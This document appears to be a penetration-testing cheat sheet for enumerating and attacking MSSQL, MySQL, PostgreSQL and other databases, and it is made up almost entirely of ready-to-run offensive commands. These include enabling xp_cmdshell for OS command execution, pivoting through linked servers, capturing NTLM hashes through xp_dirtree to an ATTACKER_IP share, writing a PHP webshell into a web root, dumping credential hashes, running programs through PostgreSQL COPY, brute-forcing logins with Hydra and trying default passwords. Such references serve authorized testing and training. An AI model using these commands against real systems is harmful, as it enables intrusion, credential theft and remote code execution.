Database Enumeration
Databases often contain sensitive data and may provide paths to privilege escalation, especially MSSQL with its tight Active Directory integration.
flowchart TD
A[Database Enum] --> B[MSSQL]
A --> C[MySQL]
A --> D[PostgreSQL]
A --> E[Oracle]
B --> B1[SPN Discovery]
B --> B2[xp_cmdshell]
B --> B3[Linked Servers]
C --> C1[UDF Injection]
D --> D1[Large Objects]
style A fill:#00ff00,stroke:#000,color:#000
style B2 fill:#a855f7,stroke:#000,color:#000
style B3 fill:#a855f7,stroke:#000,color:#000
Discovery
Port Scanning
bash
# Database ports
nmap -p 1433,1434,3306,5432,1521,27017,6379,9200 -sV TARGET
# Common database ports:
# 1433/tcp - MSSQL
# 1434/udp - MSSQL Browser
# 3306/tcp - MySQL/MariaDB
# 5432/tcp - PostgreSQL
# 1521/tcp - Oracle
# 27017/tcp - MongoDB
# 6379/tcp - Redis
# 9200/tcp - Elasticsearch
# Full database scan
nmap -sV -sC --script=*-sql*,*-mysql*,*-pgsql*,*-oracle* TARGETSPN Discovery (MSSQL)
bash
# Find MSSQL servers via SPN
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP | grep MSSQL
# LDAP query
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
-b "DC=corp,DC=local" "(servicePrincipalName=*MSSQL*)" sAMAccountName servicePrincipalName
# PowerView
Get-DomainUser -SPN | Where-Object {$_.servicePrincipalName -like '*MSSQL*'}
# CrackMapExec
crackmapexec mssql 10.0.0.0/24 -u user -p passMSSQL Enumeration
Tip
MSSQL integrates with AD authentication. Try Windows authentication with domain credentials.
Basic Connection
bash
# Impacket mssqlclient
mssqlclient.py corp.local/user:password@SQL_SERVER
mssqlclient.py corp.local/user:password@SQL_SERVER -windows-auth
# sqsh
sqsh -S SQL_SERVER -U sa -P password
sqsh -S SQL_SERVER -U corp.local\user -P password
# CrackMapExec
crackmapexec mssql SQL_SERVER -u user -p pass -d corp.local
# Test local auth
crackmapexec mssql SQL_SERVER -u sa -p 'password' --local-authDatabase Enumeration
sql
-- Server info
SELECT @@version;
SELECT @@servername;
SELECT DB_NAME();
SELECT CURRENT_USER;
SELECT SYSTEM_USER;
-- List databases
SELECT name FROM master.sys.databases;
-- List tables in database
SELECT * FROM INFORMATION_SCHEMA.TABLES;
-- List columns
SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users';
-- Find interesting data
SELECT name FROM sys.tables WHERE name LIKE '%user%';
SELECT name FROM sys.tables WHERE name LIKE '%pass%';
SELECT name FROM sys.tables WHERE name LIKE '%credit%';Privilege Checking
sql
-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT IS_SRVROLEMEMBER('serveradmin');
SELECT IS_SRVROLEMEMBER('dbcreator');
-- Current user roles
SELECT dp.name, sp.name
FROM sys.server_principals sp
JOIN sys.server_role_members srm ON sp.principal_id = srm.role_principal_id
JOIN sys.server_principals dp ON srm.member_principal_id = dp.principal_id;
-- Impersonation
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
-- Impersonate user
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
REVERT;xp_cmdshell
Warning
xp_cmdshell allows OS command execution - requires sysadmin privileges.
sql
-- Check xp_cmdshell status
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
-- Enable xp_cmdshell (requires sysadmin)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Execute commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'hostname';
EXEC xp_cmdshell 'ipconfig';
-- Impacket
mssqlclient.py user:password@SQL_SERVER -windows-auth
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoamiLinked Servers
sql
-- List linked servers
EXEC sp_linkedservers;
SELECT * FROM sys.servers;
-- Test linked server connection
EXEC sp_testlinkedserver 'LINKEDSERVER';
-- Query linked server
SELECT * FROM OPENQUERY(LINKEDSERVER, 'SELECT @@version');
-- Execute on linked server
EXEC ('xp_cmdshell ''whoami''') AT [LINKEDSERVER];
-- Recursive links (double hop)
SELECT * FROM OPENQUERY("SERVER1", 'SELECT * FROM OPENQUERY("SERVER2", ''SELECT @@version'')');Hash Capture
sql
-- Capture hash via xp_dirtree (requires SMB listener)
EXEC xp_dirtree '\\ATTACKER_IP\share';
-- xp_fileexist
EXEC xp_fileexist '\\ATTACKER_IP\share\file';
-- On attacker: Responder or Impacket smbserver
responder -I eth0
impacket-smbserver share . -smb2supportMySQL Enumeration
Basic Connection
bash
# Connect
mysql -h TARGET -u root -p
mysql -h TARGET -u user -ppassword
# CrackMapExec (if supported)
# Or use Hydra for bruteforce
hydra -l root -P passwords.txt TARGET mysqlDatabase Enumeration
sql
-- Version info
SELECT @@version;
SELECT version();
-- Current user
SELECT user();
SELECT current_user();
-- List databases
SHOW DATABASES;
-- List tables
USE database_name;
SHOW TABLES;
-- Table structure
DESCRIBE table_name;
-- Privileges
SHOW GRANTS;
SHOW GRANTS FOR 'user'@'host';User Credentials
sql
-- MySQL 5.7+
SELECT Host, User, authentication_string FROM mysql.user;
-- MySQL 5.6 and earlier
SELECT Host, User, Password FROM mysql.user;
-- All user privileges
SELECT * FROM information_schema.user_privileges;File Operations
sql
-- Read files (requires FILE privilege)
SELECT LOAD_FILE('/etc/passwd');
-- Write files
SELECT 'test' INTO OUTFILE '/tmp/test.txt';
-- Webshell (if web directory writable)
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';PostgreSQL Enumeration
Basic Connection
bash
# Connect
psql -h TARGET -U postgres
psql -h TARGET -U user -d database
# With password
PGPASSWORD='password' psql -h TARGET -U postgresDatabase Enumeration
sql
-- Version
SELECT version();
-- Current user
SELECT current_user;
SELECT session_user;
-- List databases
\l
SELECT datname FROM pg_database;
-- List tables
\dt
SELECT tablename FROM pg_tables WHERE schemaname='public';
-- List users
\du
SELECT usename FROM pg_user;
-- User privileges
SELECT * FROM information_schema.role_table_grants;Command Execution
sql
-- Check if superuser
SELECT current_setting('is_superuser');
-- COPY command (requires superuser)
COPY (SELECT '') TO PROGRAM 'id';
COPY (SELECT '') TO PROGRAM 'whoami > /tmp/whoami.txt';
-- Read file
CREATE TABLE tmp(data text);
COPY tmp FROM '/etc/passwd';
SELECT * FROM tmp;
-- Large objects
SELECT lo_import('/etc/passwd', 12345);
\lo_export 12345 /tmp/passwd.txtNmap Scripts
bash
# MSSQL
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes -p 1433 TARGET
# MySQL
nmap --script mysql-info,mysql-enum,mysql-empty-password,mysql-brute,mysql-databases,mysql-users,mysql-variables -p 3306 TARGET
# PostgreSQL
nmap --script pgsql-brute -p 5432 TARGET
# Oracle
nmap --script oracle-sid-brute,oracle-brute -p 1521 TARGET
# MongoDB
nmap --script mongodb-info,mongodb-databases,mongodb-brute -p 27017 TARGETCrackMapExec MSSQL
bash
# Authentication test
crackmapexec mssql TARGET -u user -p pass -d corp.local
# Execute query
crackmapexec mssql TARGET -u user -p pass -d corp.local -q "SELECT @@version"
# Execute command
crackmapexec mssql TARGET -u user -p pass -d corp.local -x "whoami"
# PowerShell command
crackmapexec mssql TARGET -u user -p pass -d corp.local -X "Get-Process"
# Get hashes (requires privileges)
crackmapexec mssql TARGET -u user -p pass -d corp.local --get-hashDefault Credentials
text
# MSSQL
sa:sa
sa:password
sa:Password123
sa:(blank)
# MySQL
root:(blank)
root:root
root:mysql
root:password
# PostgreSQL
postgres:(blank)
postgres:postgres
postgres:password
# Oracle
scott:tiger
sys:change_on_install
system:manager
# MongoDB
(no auth by default)
admin:admin